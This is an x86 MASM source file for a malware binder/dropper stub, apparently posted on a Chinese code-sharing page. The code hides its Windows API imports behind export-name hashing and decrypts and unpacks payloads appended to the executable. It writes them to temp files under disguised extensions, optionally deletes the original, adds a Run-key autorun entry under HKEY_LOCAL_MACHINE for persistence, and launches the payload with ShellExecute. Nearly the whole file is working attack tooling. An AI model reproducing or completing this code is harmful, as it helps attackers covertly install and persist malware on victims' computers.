📄 stub.asm
字号:
lea eax, _szOpen
push eax
push ebx
call _GetTempFileName
; Get extension/filename length
pop esi
mov edx, esi
call __lstrlen
add ecx, 12
sub _dwLen, ecx
; Set extension for temp file/new filename
mov edx, ebx ; offset lpBuf
call __lstrlen
shr dword ptr[esp], 12 ; dwParams
.IF CARRY?
lea edx, [edx+ecx-4] ; Replace extension only
.ELSE
; Delete .tmp files created by windows
pushad
push ebx
call _DeleteFile
popad
std ; Replace entire filename
lea edi, [edx+ecx]
mov al, '\'
repnz scasb
mov edx, edi
inc edx
inc edx
cld
.ENDIF
; Extension/filename decrypt & copy
xor ecx, ecx
call __lstrcpyd
; Create temporary file with needed extension
xor eax, eax
push eax ; hTemplateFile
push [esp+8] ; dwFlagsAndAttributes
mov cl, 2
push ecx ; CREATE_ALWAYS
push eax ; lpSecurityAttributes
push ecx ; FILE_SHARE_WRITE
shl ecx, 29
push ecx ; GENERIC_WRITE
push ebx ; FileName
call _CreateFile
mov edi, eax
inc eax
jz @w_ret
mov ecx, _dwLen
jecxz @skip_write
jmp @pack_disabled ; Should be fixed from GUI (STUB_FIX1)
; Unpack
call _aP_depack_asm
mov esi, _lpMem
mov ecx, eax
@pack_disabled:
; Packing isn't enabled
mov eax, ecx
; Decrypt
@decrypt:
dec eax
ror byte ptr[esi+eax], 03h
jnz @decrypt
; Write data
push eax
lea eax, _dwLen
push eax
push ecx
push esi
push edi
call _WriteFile
@skip_write:
; Close handle
push edi
call _CloseHandle
pop edi ; dwParams
shr edi, 1
.IF CARRY?
; Melting source
inc ecx ; do not decrypt
mov esi, ebx ; src
mov edx, offset lpMeltSrc ; dest
call __lstrcpyd
.ENDIF
pop eax ; add esp, 4 (dwFileAttributes)
; --- SAFE ZONE --- ;
pop edx ; offset to szKey
shr edi, 1
.IF CARRY?
; Add to autorun
push eax ; sub esp, 4
push esp ; &hk
push edx ; szKey
push 80000002h ; HKEY_LOCAL_MACHINE
call _RegCreateKey ; Create hk handle
mov edx, ebx ; Source string
call __lstrlen ; Get length of the buffer
push ecx ; Length of the buffer
push ebx ; Buffer
push 1 ; REG_SZ
push 0 ;!! Reserved
push ebx ; Keyname
push dword ptr[esp+4*5] ; hk
call _RegSetValueEx ; Write registry entry
pop eax ; add esp, 4
.ENDIF
; Execute temp file
shr edi, 1
.IF !CARRY?
pop edx ; lpOfsArgs
shr edi, 1
.IF CARRY?
push edx
; Get current filename
mov edi, offset lpSelfPath
push 500 ; nSize
push edi ; lpFilename
push 0 ; hModule
call _GetModuleFileName
mov edx, edi
call __lstrlen
add edi, ecx
std
mov al, '\'
repnz scasb
xor eax, eax
cld
inc edi
stosb
mov ah, 2 ; eax = 512
; Quote filenames
pop edx
push edi ; source3
mov ecx, ebx
add ecx, eax
push ecx ; source2 (lpSelfPath)
add ecx, eax
push ecx ; source1 (lpMeltSrc)
push edx ; fmt
add ecx, eax
push ecx ; dest (lpAltArgs)
call _wsprintf
add esp, 4*5 ; Yup, C calling convention
; Make edx point to current filename
mov edx, offset lpAltArgs
.ENDIF
push _lpPath
push edx ; arguments
push ebx
lea eax, _szOpen
push eax
push 0
call _ShellExecute
.ENDIF
@w_ret:
mov esp, _esp
ret
; IN: edx - pointer to string, OUT: ecx (length including NULL)
_lstrlen::
xor ecx, ecx
@@:
inc ecx
cmp byte ptr[edx+ecx-1], 0
jnz @B
retn
; IN: esi - input pointer, ecx - decrypt flag (zero = decrypt) OUT: [edx]
_lstrcpyd::
lodsb
jecxz @F
rol al, 4
@@:
ror al, 4
mov [edx], al
inc edx
test al, al
jnz _lstrcpyd
retn
; IN: esi - input pointer
_lstrcpyd2::
ror byte ptr[esi], 4
lodsb
dec _dwLen
test al, al
jnz _lstrcpyd2
retn
Write endp
; Export table parser
GetFunctions proc
mov edx, [ebx+3ch] ; PE
mov esi, [ebx+edx+78h] ; Export Table RVA
lea esi, [ebx+esi+18h] ; Export Table VA+18h
lodsd
xchg eax, ecx ; NumberOfNames
lodsd ; AddressOfFunctions
push eax
lodsd ; AddressOfNames
add eax, ebx
xchg eax, edx
lodsd ; AddressOfNameOrdinals
add eax, ebx
push eax
mov esi, edx
@next_func:
lodsd
add eax, ebx
; Calc function name hash
xor edx, edx
@calc_hash:
rol edx, 3
xor dl, byte ptr[eax]
inc eax
cmp byte ptr[eax], 0
jnz @calc_hash
; Get offset to ordinal
mov eax, [esp] ; AddressOfNameOrdinals
add dword ptr[esp], 2 ; Move to next ordinal word
mov edi, ebp
@scan_dw_funcs:
cmp dword ptr[edi], edx
.IF ZERO?
; Needed function found
movzx eax, word ptr[eax] ; Name ordinal
shl eax, 2 ; Multiply by 4
add eax, [esp+4]
add eax, ebx
mov eax, [eax]
add eax, ebx
stosd
.ELSE
; Skip function hash
scasd
.ENDIF
cmp byte ptr[edi], 0
jnz @scan_dw_funcs
db 90h ;!!!!
loop @next_func
pop eax
pop eax
ret
GetFunctions endp
CommonLoad proc uses edi
push edi
call LoadLibrary
xchg eax, ebx
call GetFunctions
ret
CommonLoad endp
; OEP
start:
mov edi, offset szKernel
lea ebp, [edi+7+8+9+9] ; dwFuncs
; kernel32.dll imports
call _CommonLoad
; user32.dll imports
add edi, 9
call _CommonLoad
; shell32.dll imports
add edi, 7
call _CommonLoad
; advapi32.dll imports
add edi, 8
call _CommonLoad
mov ebx, offset lpBuf
mov byte ptr[ebx+1024], 0
mov esi, 0AABBCCDDh ; This will be replaced with needed VA from GUI
; Alloc memory for packing
jmp @read_loop ; Should be fixed from GUI (STUB_FIX2)
push 0AABBCCDDh
push ecx ; equal to zero after calling _CommonLoad
call _GlobalAlloc
mov _lpMem, eax
@read_loop:
; Go to data offset
sub esi, 4
mov ecx, [esi]
jecxz @terminate
mov _dwLen, ecx
sub esi, ecx
call Write
jmp @read_loop
@terminate:
push ecx
call _ExitProcess
end start
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -